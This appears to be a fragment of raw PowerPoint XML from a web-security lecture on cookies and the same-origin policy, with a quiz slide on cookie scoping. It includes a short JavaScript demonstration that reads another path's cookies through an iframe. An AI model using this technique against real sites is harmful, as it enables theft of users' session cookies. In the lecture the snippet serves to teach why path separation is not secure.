            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64514" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CC8E3AD-37C2-0245-AEC0-D2B438F7F349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963691" y="1000370"/>
            <a:ext cx="6559274" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> scoping rules as for sending cookies to the server (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> ignored!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> returns a string with all cookies available for the document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Often used in JavaScript to customize page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>JavaScript can set and delete cookies via DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> = “name=value;  expires=…; ”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> =  “name=;  expires= Thu, 01-Jan-70”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395820209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1" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{712827DE-6171-6444-8FD0-551D2290226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ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
                <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SOP Quiz #1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB2AB7B-094D-1B45-8932-7C5E277CFB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73276" y="2079626"/>
            <a:ext cx="8069263" cy="402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4290" tIns="34290" rIns="34290" bIns="34290" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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296863" indent="-296863">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:defRPr kumimoji="1"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•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lvl="1">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="46000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2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A7B187F-5AFD-8D43-997C-2FAE7799BB23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628555" y="2058361"/>
            <a:ext cx="8813800" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="508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en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Are cookies set by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cs.cornell.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>shmat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> sent to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cs.cornell.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>greg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	 ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cs.cornell.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Are my cookies secure from the dean?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7B82259-90F1-9B4F-9B31-BF166DF155AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628555" y="4444579"/>
            <a:ext cx="8813799" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="508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en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>const iframe = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("iframe");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>iframe.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = “https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cs.cornell.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>shmat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(iframe);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>iframe.contentWindow.document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2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359455942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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5BE9838-4799-E645-B7CF-57E4D76EF1C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Path Separation Is Not Secure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9EB6569-3EA7-2440-8FAD-8A0A7C5824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Cookie SOP: Path Separation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66562" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35DB8586-51DD-1042-BB96-B961E19A1F20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069848" y="2792472"/>
            <a:ext cx="5026152" cy="3163825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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>When the browser visits  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002699"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>x.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002699"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>/A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>, it does not </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>automatically send the cookies of  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002699"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>x.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002699"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>/B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002699"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>This is done for efficiency, not security!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7379C1"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127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2928F8-9AF3-4642-9D2F-01884B0F71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DOM SOP: No Path Separation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28A8E2-F6B3-8446-BB48-FD428014C12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5428488" cy="3164509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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Script from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002699"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>x.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002699"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>/A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002699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en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>can read DOM of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002699"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>x.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002699"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>/B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>x.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>/B"&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>	alert(frames[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r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71669784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Rectangle 134">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78632963-757B-40C2-BB84-FC6107A54D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866" y="0"/>
            <a:ext cx="12193866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EE0D13DB-D099-4541-888D-DE0186F1C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0519" y="253548"/>
            <a:ext cx="5851795" cy="6384816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="6350" cap="sq" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="404040"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="from canvas">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D74CBCA3-6086-344C-A86A-16AF1E0877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" r="31042" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="424928" y="419292"/>
            <a:ext cx="5522976" cy="6053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9" name="Rectangle 138">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2853AE55-7E35-44B0-89F1-3F52B262AF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39709" y="253548"/>
            <a:ext cx="5612193" cy="6361598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DBC4BE4D-4B50-4F51-9F85-4B5D60B02D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87542" y="407588"/>
            <a:ext cx="5299768" cy="6022878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84DEC1C-013E-C24B-954B-97D790F25E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6137" y="727626"/>
            <a:ext cx="4602152" cy="1718225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
